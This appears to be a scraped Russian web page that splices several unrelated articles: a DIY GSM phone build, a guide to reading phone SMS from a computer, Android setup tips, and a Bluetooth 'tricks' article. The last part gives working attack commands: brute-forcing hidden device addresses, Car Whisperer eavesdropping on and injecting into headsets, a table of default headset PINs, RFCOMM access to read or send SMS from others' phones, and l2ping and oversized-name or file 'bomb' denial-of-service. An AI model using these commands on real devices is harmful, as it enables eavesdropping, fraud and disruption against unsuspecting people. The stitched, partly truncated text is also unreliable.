Как прочитать СМС на телефоне через компьютер: пошаговая инструкция и рекомендации. Возможность расплачиваться телефоном вместо банковской карты - мобильное приложение для IPhone и Android. Где принимают бесконтактные платежи

1 апреля 2013 в 04:36

Мобильный телефон своими руками. Часть 1

• DIY или Сделай сам

Схема не лишена недостатков, и в основном использует то, что было у меня «под рукой». Для серийной продукции такое решение, конечно, мало подходит, но для экспериментов вполне годится. Не будем подробно останавливаться здесь на работе этой схемы и на расчетах номиналов, так как они элементарны и подробно описаны в документации на соответствующие микросхемы.
Итак, собираем схему на макетной плате (рис. 3) и проводим испытания под нагрузкой, при этом контролируя температуру тепловыделяющих элементов. Испытания пройдены успешно.
Если вы собираетесь использовать только GSM-модуль, без других узлов, то источники +5В и 3,3В не нужны.

Рис.3. Плата источника питания

Плата клавиатуры

Схема платы клавиатуры практически без изменений взята из документации на модуль. Однако, уже после того, как она была собрана, оказалось, что ряд кнопок не поддерживается данной версией модуля. В принципе, можно вообще не подключать клавиатуру к модулю, все действия с модулем можно производить с помощью AT-команд через UART.
Схема клавиатуры приведена на рис. 4. Диоды служат для защиты модуля от статического напряжения.

Рис.5. Плата клавиатуры

Плата GSM-модуля

Переходим к основной плате.
Так как устройство собрано на макетной плате, я решил использовать не модуль Quectel M10, который распаивается на плате, а его «производную», модуль с модулем M10-TE-A, имеющий разъём IDC с шагом контактов 1,27мм (двухрядная розетка). Антенна подключается к специальному маленькому разъёму (GSC) через переходник GSC-SMA. В серийном устройстве, на нормальной плате, разумеется, имеет смысл использовать обычный модуль M10. Следует иметь в виду, что M10 и M10-TE-A имеют разную нумерацию выводов, поэтому схему также придётся скорректировать.

Итак, схема платы:

И сама плата:

Рис.7. Плата GSM

Схема содержит модуль, держатель SIM-карты, разъем для подключения гарнитуры, разъем клавиатуры и пару микросхем: интерфейс RS-232 и вспомогательную микросхему для подключения к модулю пъезоизлучателя и светодиода. Никаких особых схемотехнических изысков здесь нет, практически всё взято из документации на модуль.
Ещё пара слов про подключение клавиатуры. Так как ряды ROW3, ROW4 и столбец COL4 не используются модулем, я решил задействовать их для кнопок включения и выключения модуля.
Дисплея телефон тоже не имеет. Хотя модуль имеет выводы для прямого подключения дисплея, его всё равно нельзя подключить, так как эта функция (как и многие другие) отключена у модулей, поступающих в открытую продажу.
Для питания часов реального времени используется ионистор (конденсатор ёмкостью 1Ф, большая круглая штука на плате). Если часы не нужны, его можно не устанавливать.

Сборка

Итак, пришла пора собрать наш конструктор:

Рис. 8. Всё готово к сборке

Рис. 9. Телефон в сборе

Теперь можно вставить SIM-карту, подключить питание, подключить телефон к компьютеру через COM-порт и приступить к исследованию AT-команд.

Пара слов про бюджет.

Бюджет

Модуль Quectel M10-TE-A 665,64 р.
Антенна 120 р.
Держатель SIM-карты SCV-W2523X-06-LF 21,80р
Кабель-переходник GSC-SMA - 161,86р.

Остальные комплектующие найдены в радиусе трёх метров.

В заключение первой части

В следующей части будут рассмотрены AT-команды, поддерживаемые модулем.

Ссылки

К сожалению, на сайте производителя представлена далеко не полная информация о модуле. Большая часть pdf-файлов не выложена в открытый доступ, тем не менее, в сети можно найти некоторые из них. Я взял на себя труд собрать эти файлы и

Сегодня мы сделаем вполне себе рабочий, хотя и довольно простой в плане функционала, мобильный телефон.

Вот перечень тех функций, которые будет поддерживать наш телефон:

• - Принимать и делать звонки
• - Принимать и отправлять СМС
• - Хранить записную книжку
• - Показывать время
• - Будить в заданное время

Зачем я делаю этот проект? Отчасти потому что это весело, и отчасти потому что, хотя телефоны и стали за последние 10-15 лет вездесущими, очень малый процент людей догадывается и понимает как они работают, и как они устроены. С виду они кажутся сложными, но на самом деле собираются также как электро чайник или микроволновка. А так как телефоны вездесущи и популярны, в мире полно компаний которые выпускают нужные нам комплектующие.

Проведя пару вечером за компьютером я натыкался на места где можно было бы купить все элементы по довольно низким ценам в малом количестве, и для их сборки не нужно было дополнительное оборудование, только твои, надеюсь умелые руки. Возможно я что то упростил, и конечно придется приложить немного усилий для сборки телефона, но поверь мне, собрать его гораздо проще, чем получить степень по физике.

За прошлый год я собрал несколько версий такого телефона, и использовал их как свой основной девайс. Плюс я проводил занятия с другими любителями электроники, на которых мы также собирали разные вариации этого телефона. Тебе не понадобиться иметь каких то особых знаний в электронике, а вот умение конфигурировать софт, паять мелкие компоненты, иметь навыки в лазерной резке - все это пригодится. Хотя если ты этого раньше не делал, все равно попробуй, но будь готов к тому, что будет немного сложнее. Хотя все же я бы посоветовал приступать к проекту только если у тебя уже есть навыки в пайке и в работе с вещами от Arduino, или ты можешь найти кого-то с опытом.

Шаг 1: Материалы и комплектующие

Ну что, кажется аппарат для дозвона на Луну готов:)

Вступить в клуб

узнавайте о самых интересных инструкциях раз в неделю, делитесь своими и участвуйте в розыгрышах!

Не всех пользователей интересует то, как прочитать СМС на телефоне через компьютер. Обычно в этом нет никакой необходимости. Хотя есть возможность настроить дистанционный доступ к гаджету через ПК. Также вы можете попробовать прочитать чужие сообщения. Что для этого делать, узнаем дальше.

Для чего?

Некоторые получаемые сообщения могут содержать важную информацию. Их необходимо сохранить, что обычно и делают пользователи. Но не всегда удается их оставить у себя. Бывает так, что система "глючит", перестает работать сенсорный экран, либо телефону нужно сделать сброс до заводских настроек.

А иногда вопрос о том, как прочитать СМС на телефоне через компьютер, интересует тех, кто часто забывает свой телефон в машине или в сумке. Чтобы быстро принять информацию и оставаться на связи, можно настроить дистанционный доступ к смартфону. В общем, причин для этого много, как и способов решения.

Перенос

Но для начала рассмотрим, как просто перенести СМС со смартфона на ПК. Этот вариант отлично подходит для тех, кто хочет сохранить некоторые сообщения. Конечно, это можно сделать и на телефоне, но память не безгранична, а любые системные сбои заставят вас удалить все содержимое без возможности восстановления.

Если вы не знаете, как читать СМС со своего телефона, сидя за компьютером, в этом вам поможет резервная копия. Чтобы её сделать, нужно осуществить экспорт информации. Кстати, в старых моделях телефонов, которые не имели операционной системы, в комплекте шли диски с фирменным ПО. Утилиты синхронизировали данные и помогали управлять ими на ПК.

Программа

Сейчас, чтобы сделать резервную копию, можно использовать специальную программу. К примеру, есть Android SMS. Утилита имеет удобный интерфейс. В ней вы сможете собирать все сообщения с телефона и просматривать их.

После того как вы откроете программу, она попросит подключить смартфон через кабель или с помощью кода QR. После подключения появится возможность перейти во вкладку с SMS. Тут можно создавать резервную копию сообщений, просматривать их по диалогам и управлять.

Выбранные сообщения нужно экспортировать. После нажатия специального значка вам будет предложено несколько вариантов этого процесса. Утилита также позволяет просматривать фото и сохранять их, корректировать список контактов, использовать файлы и т. д. То есть она работает как проводник смартфона на компьютере.

Подобных приложений в Интернете много. Нужно просто поискать, возможно, парочку придется попробовать лично. Все они удобные, есть русифицированные версии. Большинство из них помогает синхронизировать данные со смартфона, управляя содержимым.

Дистанционный доступ

В Интернете часто пользователи ищут способ, как на компьютере посмотреть СМС, если гаджета коснулись неполадки. Это может быть и разбитый экран, и сбои в работе тачскрина. Чтобы узнать, кто же вам написал, нужно заранее подключить дистанционный доступ. Так у вас всегда будет способ достать данные из телефона через ПК.

AirDroid

Это утилита имеет огромный набор опций и возможностей. Она позволяет удаленно совершать звонки разным абонентам, просматривать телефонную книгу, создавать сообщения, устанавливать файлы и многое другое. Есть в программе и возможность поиска телефона по карте. Опция покажет вам, где вы оставили свой гаджет.

Есть у приложения и более интересные функции. К примеру, оно передает свое местоположение и может запустить камеру телефона, не открывая самого приложения. Так, если произошла кража, вор не заметит, что за ним следят. Кроме того, приложение открывает доступ к карте памяти, превращая накопитель в удаленное хранилище.

Работа с AirDroid

Если вы до этого не знали, как прочитать SMS без телефона, то работа с этой программой откроет все карты. Скачать её нужно с Google Play. На телефоне зарегистрировать учетную запись. После нужно перейти на сайт программы через ПК и ввести эти же данные.

Для успешной синхронизации устройствам нужно, чтобы они находились в одной сети. Чтобы не усложнять ничего, просто подключитесь через Wi-Fi. Когда соединение будет завершено, веб-обозреватель покажет вам содержимое телефона.

Пользователь видит рабочий стол гаджета. Слева находятся иконки. Тут можно зайти в любую программу или приложение, которое есть на телефоне. Можно использовать ярлык быстрого доступа. Справа будут доступны все инструменты. Сюда мы загружаем нужные файлы, вводим ссылки, открываем буфер-обмена и т. д.

К сожалению, работа с этой программой не совсем идеальная и комфортная. Есть некоторые ограничения. Чтобы использовать смартфон в таком режиме, нужны права суперпользователя. Иначе некоторые функции будут недоступны - не сможете делать удаленно скриншоты, например.

Несмотря на наличие бесплатной версии, полный функционал и неограниченные возможности есть только у премиум-версии. С ней вы сможете использовать камеру, звонить, передавать небольшие файлы и не смотреть рекламу. Если вы хотите попробовать утилиту, можете написать о ней отзыв в "Твиттере" и получить двухмесячную подписку.

Поскольку вам нужна работа только с сообщениями, то и бесплатной версии вам может быть вполне достаточно.

WiFi File Transfer

Как прочитать СМС на телефоне через компьютер? Если вам не подошла предыдущая программа, можете попробовать WiFi File Transfer. Эта утилита помогает синхронизировать смартфон с компьютером без кабеля. Очень удобно, если у вас вдруг поврежден провод или не работают порты.

Это хороший файловый-менеджер, который помогает передавать файлы разного размера и формата. Работает в том случае, если оба устройства находятся в одной сети. Тогда утилита присылает ссылку, чтобы браузер мог быстро присоединиться к гаджету.

Снова-таки, есть бесплатная версия, которая имеет ряд ограничений. К примеру, больше 5 Мб передавать нельзя. Конечно, если это резервная копия сообщений, то большего и не надо, а вот если нужно передавать более емкие документы, тогда придется купить платную версию. Благо она стоит около 40 рублей.

SnapPea

Пользователи, которые не знают, как прочитать СМС на телефоне через компьютер, могут попробовать использовать приложение SnapPea. Оно также дает компьютеру доступ к гаджету. Чтобы аппараты синхронизировать, нужно зайти в браузер ПК на официальный сайт и ввести код, который дала программа.

Подключать приложение можно только по сети Wi-Fi. При этом оба девайса должны быть в одной Сети. В целом это и вся настройка.

По функционалу программа заметно уступает AirDroid. Но тем, кому нужно просматривать СМС, будет достаточно. Она как раз позволяет читать сообщения и отправлять, перемещать изображения и удалять их. Можно работать с телефонной книгой, удалять утилиты или устанавливать файлы расширения «.apk». Найти синхронизацию с камерой или звонками тут не получиться.

Зато эта утилита быстрая. Единственное, можно столкнуться с периодическими разрывами соединения. Система будет просить заново вводить код. К этому нужно быть готовым.

Чужие сообщения

Многие пользователи хотят узнать, как читать СМС с чужого телефона. В Интернете на этот счет много вариантов. Большинство из них вряд ли можно считать законными. Имеется даже онлайн-способ, позволяющий узнать, какое сообщение пришло на смартфон вашего мужа или жены. Все это выглядит довольно сомнительно, и отдавать деньги за подобные утилиты глупо. Многие их них оказываются неработоспособными и фейковыми.

Некоторые пользователи хотят узнать, можно ли прочитать СМС с телефона через компьютер. «Теле2» - это оператор, который на своем сайте не раз отвечал на подобные вопросы. Конечно, большинство пользователей не хочет шпионить. Такое желание возникает из-за того, что смартфон был утерян и т. д.

По словам оператора, восстановить текст сообщений нельзя, поскольку СМС, проходя от абонента к получателю, не сохраняется у оператора в базе. Подобные операции запрещены законом во многих странах. Поэтому ваши СМС - это конфиденциальная информация.

Разные, и в то же время все они очень похожи друг на друга. Практически каждый на своем смартфоне выполняет одни и те же функции, разница лишь в том, какими приложениями пользуется тот или другой любитель Android. Однако есть всего 5 вещей, которые обязан сделать со своим Android-смартфоном абсолютно каждый, независимо от рода деятельности или интересов. Вот этот короткий список:

1. Настройте удаленное управление

— это то, что вы должны настроить в первую очередь. Эта программа, скорее всего, не принесет пользы сразу, но может оказаться полезной потом. В случае утери смартфона она позволит удаленно заблокировать его, отправить сигнал, сообщение или удалить все данные с него. Стоит надеяться, что эта программа никогда вам не пригодится, но в то же время это первое, что нужно установить и настроить.

2. Прокачайте Wi-Fi

Для начала стоит выполнить настройку браузера Chrome. В меню настроек браузера есть функция сокращения использования данных. Вы можете существенно сократить расходы на трафик. Второй момент, который важно знать, это возможность настроить свой телефон на избежание плохого Wi-Fi-соединения. Именно плохое соединение сильно разряжает аккумулятор смартфона, и вы можете отказаться от него в расширенных настройках оптимизации Wi-Fi-соединения.

3. Установите Pushbullet

Есть огромное количество разных приложений. Кому-то нужны и интересны одни, кому-то другие. тоже будет полезен не каждому, но многим. Эта программа присылает уведомления с вашего смартфона на компьютер, а также позволяет быстро обмениваться ссылками и другой информацией между смартфоном и компьютером. Это удобно.

4. Настройте NFC

К сожалению, сегодня многие даже не понимают — какие преимущества им дает смартфон с NFC. А ведь эта технология может существенно сэкономить время. Вы можете настроить Bluetooth-соединение с гарнитурой всего одним движением, вы можете разбросать метки по дому и рабочему месту, полностью автоматизировав отправку некоторых сообщений и другие действия. Какой-то парень даже вживил метку в свою руку, чтобы ему не пришлось разблокировать смартфон. Я к этому не призываю, но стоит изучить возможности NFC, если ваш смартфон поддерживает эту технологию.

5. Настройте защиту на блокировку экрана

Вернемся к первому пункту. Здорово, когда ваш телефон находится под вашим контролем даже после утери. Еще лучше, если все ваши персональные данные также останутся вашими, и для этого стоит установить защиту на экран блокировки. Неважно — нравится ли вам код или графический ключ, просто установите что-то, что вы способны хорошо запомнить в настройках безопасности смартфона.

По материалам AndroidPit

Все отлично знают, что с помощью Bluetooth можно передать файл с девайса на девайс или подключить беспроводную гарнитуру. Но этим его возможности не ограничиваются. Имея при себе нужный инструмент, можно творить настоящие чудеса. Так почему бы не попробовать себя в роли фокусника?

Встроенный модуль технологии Bluetooth (или, если более официально, IEEE 802.15.3 ) давно перестал быть диковинкой. Стоимость модуля настолько мизерна, что не встраивает его в мобильный, ноутбук или КПК только ленивый производитель. Да и то – по соображениям маркетинга. Словом, Bluetooth используют практически все. Но лишь единицы знают, что, используя технологию, рискуют выдать свои конфиденциальные данные. Но начнем все-таки с хорошего!

Трюк 1: Используем BT для удаленного доступа к компьютеру

Как-то для проведения презентации я пригласил одну длинноногую подругу – нажимать кнопку «пробел», чтобы перелистывать слайды в Power Point. Это удовольствие стоило мне недешевого обеда и двух часов пустых разговоров с Barbie girl. После этого я твердо решил: в следующий раз проблему отсутствия пульта ДУ я обойду по-другому. И обошел, воспользовавшись мобильником! Да-да, прямо с телефона можно перелистывать слайды, управлять музыкой – и делать еще бог знает что. Главное, чтобы на мобильнике и компьютере были установлены BT-модули. Мало того, что сэкономишь деньги и силы, так еще и выглядеть будешь непростительно модно. Показать такой фокус способен каждый, кто заюзает утилиту
Bluetooth Remote Control , не столь давно обновившуюся до версии 3.0. Она позволяет управлять компьютером с экрана любого мобильного телефона. Все очень просто. На компьютер ставится специальная серверная часть, а на телефон – программа-клиент, написанная на Java (требуется MIDP 2.0). После настройки нехитрой схемы ты сможешь дистанционно управлять мышкой и клавиатурой компа. И самое главное – получишь доступ к удаленному рабочему столу. Настоящий Remote Desktop прямо с экрана мобильного телефона! Ну, а с длинноногой подругой время можно провести куда более удачно. Bluetooth Remote Control пригодится и здесь: чтобы поставить
романтическую музыку:).

Трюк 2: Контроль доступа с помощью BT

Если ты работаешь в комнате, где вместе с тобой сидит с десяток коллег, тебе наверняка приходилось блокировать компьютер, когда уходишь в другое помещение. А что? Не успеешь отойти, как кто-нибудь уже покопается на твоем харде. Расклад не самый приятный. В общем, лочить компьютер нужно обязательно, вопрос в том – как? Можно использовать стандартные возможности винды и по десять раз на дню вводить длиннющий пароль. Или же делать это красиво с помощью технологии Bluetooth . Все просто, как дважды два. Отходишь от компьютера – и он тут же блокируется. Возвращаешься обратно – и лока как не бывало! Единственное условие: как в компьютере, так и в мобильном телефоне должен быть установлен модуль
Bluetooth , а в системе заинсталена программа LockItNow (ты легко можешь ) . Впрочем, приятелям и коллегам можно рассказывать о телепатических возможностях, а потом продавать секрет за деньги:). Кстати говоря, если под рукой BT-модуля нет, то его можно заменить телефоном, который поддерживает «синий зуб» (подключи по COM-порту).

Трюк 3: Снифаем BT-трафик из эфира

Мастерство начинается с понимания. Не возникало ли у тебя когда-нибудь желания посмотреть внутрь протокола и узнать, как происходит обмен данными через «синий зуб»? Прослушивание трафика Bluetooth может выполняться только «в себя», то есть выполняется перехват исходящего и входящего трафика узла, на котором ты отдал команды. В этом деле немаловажное значение имеет так называемый Host Controller Interface (HCI), который позволяет обращаться к передатчику. HCI-узел обычно подключается к узлу драйвера устройства Bluetooth (входящий поток) и к узлу L2CAP (исходящий поток). Windows платформа по умолчанию такой возможности не предоставляет. Однако сторонними разработчиками были выпущены
специальные драйвера, которые позволяют переводить стандартный донгл в сниффер . Традиционно показательной в этом плане является работа FTS4BT Wireless Bluetooth Protocol Analyzer , стоящего бешеные деньги. Продукт цепляет тем, что поддерживает новый Bluetooth v2.0 + EDR , на базе которого работают современные устройства и, более того, способен на лету декодировать весь трафик из эфира, аккуратно отсортировывая аудио, данные протоколов приложений и многое другое. Понятно, что для снифинга (да и вообще) наиболее актуальны USB-донглы класса 1, радиус действия которых достигает ста метров.

Трюк 4: Работаем с BT-адаптером напрямую

Долгое время Bluetooth стеки для Windows предоставляли настолько скудные возможности , что программисты просто обходили эту платформу стороной. Этим объясняется, что большинство программ для серьезных забав c «синим зубом» разрабатываются под никсовую платформу. Некоторые из хитрых приемов мы разберем именно на это платформе, а именно FreeBSD (напомню, что на диске прошлого номера мы выкладывали свежий 7.0 релиз этой ОС). Сама технология Bluetooth официально стала поддерживаться на ней только с 5-ой ветки на базе подсистемы Netgraph. Радует, что большинство USB-адаптеров совместимы с драйвером ng_ubt (его необходимо завести перед подключением устройства). Попробуем?

1. Подключаем устройство: kldload ng_ubt
2. Копируем сценарий подгрузки стека в удобное место: cp /usr/share/examples/netgraph/bluetooth/rc.bluetooth /usr/local/etc/rc.bluetooth
3. Копируем сценарий подгрузки стека в удобное место и запускаем: sh /usr/local/etc/rc.bluetoots start ubt0

Теперь хочу познакомить тебя с утилитой hccontrol. Это одна из основных программ для работы с BT-модулем. Именно она выполняет все операции, связанные с интерфейсом HCI, и имеет следующий синтаксис: hccontrol –n <имя_hci_узла> <команда>. Проверим функциональность нашего устройства, просканиров эфир на наличие устройств:

hccontrol –n ubt0hci Inquiry

Как результат, утилита выведет информацию о найденных устройствах, в том числе их MAC-адреса. Надо заметить, что каждое из устройств Bluetooth, будь то хедсет или обыкновенный телефон, представляет некоторый набор сервисов . Базовый перечень включает в себя: CIP (Common ISDN Access), CTP (Cordless Telephony), DUN (dial-up networking), FAX (FAX), FTRN (Obex File Transwer), HSET (Headset), NAP (Network Access Point). Чтобы выяснить, какие сервисы предоставляет то или иное устройство, используется запрос на специальном протоколе SPD (Service Descovery Protocol). Сервер SPD работает непосредственно на машине-хосте и является исключительно информационной составляющей (повлиять на него
невозможно). Определить, какие сервисы предоставляют найденные устройства, можно с помощью соответствующей утилиты:

# spdcontrol -a browse

Трюк 5: Находим скрытые устройства

Итак, эфир мы просканировали и даже выяснили, какие сервисы доступны на активных устройствах. Но вот загвоздка! Некоторые девайсы никак не выдают своего присутствия, поскольку находятся в режиме «Undiscoverable mode» и не отвечают на широковещательные запросы. По настройкам своего телефона ты наверняка знаешь о подобной опции безопасности. Однако обнаружить такие устройства все-таки можно !

Самый известный прием их обнаружения – тупой перебор MAC-адресов, то есть последовательная посылка запросов на разные адреса из определенного диапазона. Для этого нужно использовать очень простую утилиту Redfang , которая перебирает последние шесть байт адреса устройства и таким образом обнаруживает спрятавшиеся устройства.

Другой вариант – это использовать пассивные методики : перевести свое устройство в режим ожидания, при этом назначить сети какое-нибудь привлекательное имя:

hciconfig hci0 name BT_YANDEX
hciconfig hci0 down
hciconfig hci0 up
hcidump -V | grep bdaddr

В результате отобразятся все входящие соединения, среди которых могут запросто оказаться товарищи со скрытыми идентификаторами.

Трюк 6: Перехватываем из эфира разговоры по гарнитуре

Одна из основных угроз радиотехнологий состоит в том, что данные можно перехватить. Первое, что приходит в голову, касаемо Bluetooth – прослушать разговоры людей, использующих гарнитуру . И зачастую это реально! На хакерском фестивале What the Hack в Нидерландах специалисты из группы Trifinite продемонстрировали, как при помощи ноутбука с Linux, специальной программы и направленной антенны можно подслушать, о чем говорит через Bluetooth-гарнитуру водитель проезжающего автомобиля. Группа разработала программу Car Whisperer («Автомобильный шептун»). Возможности программы относительно невелики: прослушать можно только тех, кто забыл сменить заводские пароли доступа к Bluetooth наподобие
«0000» или «1234». Но таких бедолаг, поверь, очень и очень много! «Шептун» способен вклиниться и успешно пройти «pairing» устройств, получив информацию, передаваемую с каркита или хедсета на мобилку. Хочу обратить внимание: утилита позволяет не только получить информацию, передающуюся между хедсетом и мобилой, но и инжектить туда свою. Мы решили проверить возможности этой программы, скачав Car Whisperer с сайта разработчиков.

hciconfig адаптер class 0x500204
# 0x500204 - это класс «phone»

В противном случае некоторые «умные» девайсы могут заподозрить неладное. Смотрим синтаксис утилиты, который выглядит следующим образом:

./carwhisperer «что внедряем в линию» «что захватываем из линии» «адрес устройства» [канал]

Мы взяли внедряемый файл прямо из папки утилиты, а в качестве выходного указали out.raw:

./carwhisperer 0 message.raw /tmp/out.raw
00:15:0E:91:19:73

На выходе получаем файл out.raw. Прослушать его в чистом виде нельзя: необходимо преобразовать в аудио формат, для чего потребуется дополнительная утилита. Подойдут довольно многие аудио конвертеры, например :

raw –r 8000 –c 1 –s –w out.raw –t wav –r
44100 –c 2 out.wav

Кроме прослушивания, можно войти в систему, просмотреть телефонную книгу и воспользоваться другими возможностями «свободных рук» с Bluetooth. Принцип такой: сначала осуществляется поиск активных устройств и проверка на предмет сервиса HS (Head Set). Далее исследуется MAC-адрес устройства и производится попытка подключения с использованием стандартного ключа. Если коннект установлен, то с устройством можно делать все, что угодно (в пределах доступного набора AT-команд).

На практике это выглядит следующим образом. Сначала осуществляется поиск всех активных гарнитур с помощью команды «sdptool search HS», которая выдает примерно такой ответ:

Inquiring ...
Searching for HS on 00:0A:3A:54:71:95 ...
Service Name: Headset
Service RecHandle: 0x10009
Service Class ID List:
"Headset" (0x1108)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 7
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Headset" (0x1108)
Version: 0x0100

Далее осуществляется попытка открыть RFCOMM соединение на SCO audio channel с помощью команды «rfcomm connect 2 00:0A:3A:54:71:95 1» и посылка нужных AT-команд. Приведу небольшую статистическую заметку о данных авторизации на некоторые модели беспроводных гарнитур:

Nokia (00:02:EE...) - pin="5475"
Audi UHV (00:0E:9F...) - pin="1234"
O"Neill (00:80:37...) - pin="8761"
Cellink (00:0A:94...) - pin="1234"
Eazix (00:0C:84...) - pin="1234"

Кстати говоря, тот же принцип может использоваться для несанкционированного подключения и ко всем остальным устройствам . При помощи AT-команд и протокола RFCOMM можно, к примеру, прочитать SMS-сообщение или даже отправить его с чужого телефона на платный номер, поставив владельца девайса на деньги. Будь бдителен!

Трюк 7: DDoS BT-устройств

Подход традиционен. DDoS реально провести, когда хостовый девайс («master») выполняет работу, во много раз превосходящую клиентскую. Такую ситуацию называют атакой на отказ в обслуживании (Denial Of Service). Она может подвесить телефон или привести к быстрой разрядке батарейки. Провести атаку можно несколькими способами. Начнем со стандартных средств. Самое очевидное – пинговать девайс пакетами большого размера. Сделать это можно, указав утилите l2ping в качестве параметра «-s» флаг:

# l2ping -s 10000 -b "МАС адрес"

Сама программа, как ты уже понял, является родственником ping в bluetooth среде и служит для проверки связи и наличия соединения. Другой способ, принципиально отличающийся от первого, состоит в использовании приема «fuzzing» – своеобразной техники-лотереи, потому как заранее неизвестно, что произойдет. Это новое веяние в выявлении уязвимостей в продуктах без анализа исходных кодов. Полагается техника только на интерактивное общение с объектом на понятном для него языке, но с абсолютно хаотичными аргументами и значениями-переменными. Хакерской задачей будет сделать так, чтобы видимое название телефона состояло из достаточно большого числа элементов. При обнаружении его «master’ом» в 70%
случаев происходит переполнение или отказ в обслуживании:

hciconfig hci0 name `perl -e "print "ash" x 3137"`
# Команда для линукса
hccontrol –n адаптер change_local_name “новое имя”)
# пример для FreeBSD

Многие телефоны по-прежнему не могут переварить файлы-бомбы. Вот простая реализация подобного приема.

1. Сначала готовят «бомбу». Известный пример:
   echo `perl -e ‘print "skvz" x 3137’` > file
2. После чего используют модифицированную утилиту для взаимодействия с OBEX – USSP PUSH (xmailserver.org/ussp-push.html)
   ./obextool push file 00:0A:3A:54:71:95 `perl -e ‘print "skvz" x 3137’` 3